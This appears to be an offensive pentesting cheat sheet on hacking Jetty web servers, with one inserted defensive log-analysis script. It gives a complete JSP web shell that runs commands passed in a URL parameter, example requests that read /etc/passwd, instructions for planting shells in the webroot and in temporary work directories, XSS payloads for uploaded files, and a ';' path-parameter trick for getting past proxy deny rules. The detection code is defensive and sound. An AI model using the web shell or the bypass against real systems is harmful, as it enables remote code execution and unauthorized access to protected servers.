Jetty

Detect

Jetty ignores a trailing ;" in the request path, while other servers reject it:

/;" or /existingUrl;"/

Nginx:  GET /;" -> 404 Not Found
Apache: GET /;" -> 404 Not Found
Jetty:  GET /;" -> 200 OK

Jetty Overview

Variables:

$JETTY_HOME — the Jetty distribution directory

$JETTY_BASE — the directory holding the configuration files, web applications, etc.; it is the working directory (./) of the Jetty server process

All web applications are stored in $JETTY_BASE/webapps/

When applications are deployed, each is assigned its own context. Every context has a contextPath property that defines the URL path served by the associated application: an application with contextPath "/test" processes all HTTP requests to /test/*. Using contextPath and virtualHost, different paths and virtual hosts can be mapped to different applications.

Jetty can also have a root web application (the catch-all context) located in $JETTY_BASE/webapps/root/ that processes all requests to /. Besides /, this application handles every request for a resource that is not associated with any registered context.

Discovering contexts

Jetty has one interesting quirk. If no application is responsible for the root context, a request to a non-existent virtual host returns the paths of all registered contexts.

GET / HTTP/1.1
Host: randomHost-sjdnvjks

RCE via File Upload

JSP Servlets

By default, JSP files are processed in Jetty by org.eclipse.jetty.jsp.JettyJspServlet. This is configured in $JETTY_HOME/etc/webdefault.xml. Another default setting makes Jetty compile and execute all files matching the following masks:

  • *.jsp
  • *.jspf
  • *.jspx
  • *.xsp
  • *.JSP
  • *.JSPF
  • *.JSPX
  • *.XSP

To achieve RCE, we need to upload a file with one of these extensions to the server.

Note: to enable JSP file processing in Jetty, the jsp module must be enabled.

Case 1

As I mentioned earlier, Jetty may have a root application that processes requests to the server root. Therefore, the easiest way to achieve RCE is to upload a JSP web shell to $JETTY_BASE/webapps/root/ and then access it via HTTP.

GET /exec.jsp?cmd=cat+/etc/passwd HTTP/1.1
Host: jetty

// $JETTY_BASE/webapps/root/exec.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
   // the original listing had "Process.p;", which does not compile; it is a declaration
   Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
   InputStream in = p.getInputStream();
   DataInputStream dis = new DataInputStream(in);
   String disr = dis.readLine();
   while ( disr != null ) {
      out.println(disr);
      disr = dis.readLine();
   }
}
%>

Case 2

A JSP shell can also be uploaded to $JETTY_BASE/work/, which is normally used as the parent directory for all temporary folders of web applications. When the web server starts, a directory for each application is created in it, named in the format:

"jetty-"+host+"-"+port+"-"+resourceBase+"-_"+context+"-"+virtualhost+"-"

If we somehow manage to find out what temporary directory has been created, we can try to upload a JSP shell via: $JETTY_BASE/work/"jetty-"+host+"-"+port+"-"+resourceBase+"-_"+context+"-"+virtualhost+"-"/webapps

Next we open the URL with the required context in our browser and we have RCE.

GET /testApp/exec.jsp?cmd=cat+/etc/passwd HTTP/1.1
Host: 192.168.99.129

File in:

work/jetty-0_0_0_0-8080-test_war-_testApp-any-/webapp/exec.jsp

Web application upload

If uploading JSP files is impossible or the JSP handler is not enabled, we can use the automatic deploy (hot deploy) feature that is enabled in Jetty by default. When hot deploy is enabled, $JETTY_BASE/webapps/ is constantly scanned for new web applications that are automatically deployed without us having to restart the Jetty server.

A web application in Jetty can be any of the following:

  • A regular directory
  • A WAR file
  • An XML file (Jetty context XML file)

This means we have two file types that can give us RCE if we upload them to the server.

XSS via file upload

We can achieve XSS on a Jetty server with standard configuration by uploading not only well-known .html or .svg files, but also other files with less popular extensions. To test this, I used two types of payload:

<!-- XML-based: -->
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert('XSS')</script>

<!-- HTML-based: -->
<script>alert('XSS')</script>
The results are in the table below:

Extension          Payload
.htm               HTML
.mathml            XML
.rdf               XML
.svgz              XML
.xht               XML
.xhtml             XML
.xml               XML
.xsd               XML
.xsl               XML
.[randomSymbols]   HTML

Bypass WAF or filters

With a thorough understanding of Jetty's inner workings, we can find ways to exploit vulnerabilities in applications running on it even when those vulnerabilities are mitigated only by a WAF.

Case 1

Knowing how the Jetty server parses URL addresses, we can bypass filters on a proxy server. Imagine that a Jetty server is deployed behind an NGINX proxy with a rule that blocks requests to /adminURL/*.

location ~ /adminURL/ {
   deny all;
}
location / {
   proxy_pass http://localhost:8080;
   proxy_set_header Host $host;
   proxy_set_header X-Real-IP $remote_addr;
}

If this rule is configured only on the proxy, we can send an HTTP request to /adminURL;random/ and obtain access to the protected resource on the server:

/adminURL/ -> 403
/adminURL;aaa/ -> 200
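A detection-side check for the proxy-only rule above, added here as an example and not taken from the original page: it re-resolves each logged request target the way the servlet container will (dropping ";..." path parameters from every segment) and flags entries whose effective path falls under the protected prefix even though the raw path that the proxy regex matched differs from it. The access-log lines, the /adminURL/ prefix and the function names are constructed for the example; the segment-wise stripping is a simplified model of Jetty's path handling.

```python
import re

# Constructed nginx access-log sample (not from the original page): the
# second and fourth entries use ';' path parameters to slip past a
# proxy-only "location ~ /adminURL/ { deny all; }" rule.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /adminURL/ HTTP/1.1" 403 153
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /adminURL;aaa/ HTTP/1.1" 200 2048
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /public/index.html HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /adminURL;/users?page=1 HTTP/1.1" 200 901
"""

# Common log format: client ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def jetty_effective_path(target: str) -> str:
    """Resolve a request target the way the servlet container will.

    Simplified model (an assumption for this example): the query string is
    dropped and each path segment loses everything from its first ';'
    onward, so '/adminURL;aaa/' and '/adminURL;/users' both land in the
    /adminURL/ context that the proxy regex never saw.
    """
    path = target.split("?", 1)[0]
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def find_path_param_bypasses(log_text: str, protected_prefix: str = "/adminURL/"):
    """Return (ip, raw_target, effective_path, status) for requests whose
    effective path is protected although the raw path differs from it."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m.group("target")
        effective = jetty_effective_path(raw)
        if effective.startswith(protected_prefix) and effective != raw.split("?", 1)[0]:
            hits.append((m.group("ip"), raw, effective, m.group("status")))
    return hits


if __name__ == "__main__":
    for hit in find_path_param_bypasses(SAMPLE_LOG):
        print("suspicious:", hit)
```

The durable fix is the one the text implies: enforce the access check in the application or on Jetty itself rather than only at the proxy, and treat a hit from this check as a sign that the proxy rule is the only control in place.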

More examples are in the article linked under Papers & Notes.

Papers & Notes

Last updated 2 years ago

Was this helpful?

The results are in the table below. ( of extensions)

PT Swarm Research:
https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/

Note: Tomcat has the same feature, but it is disabled by default.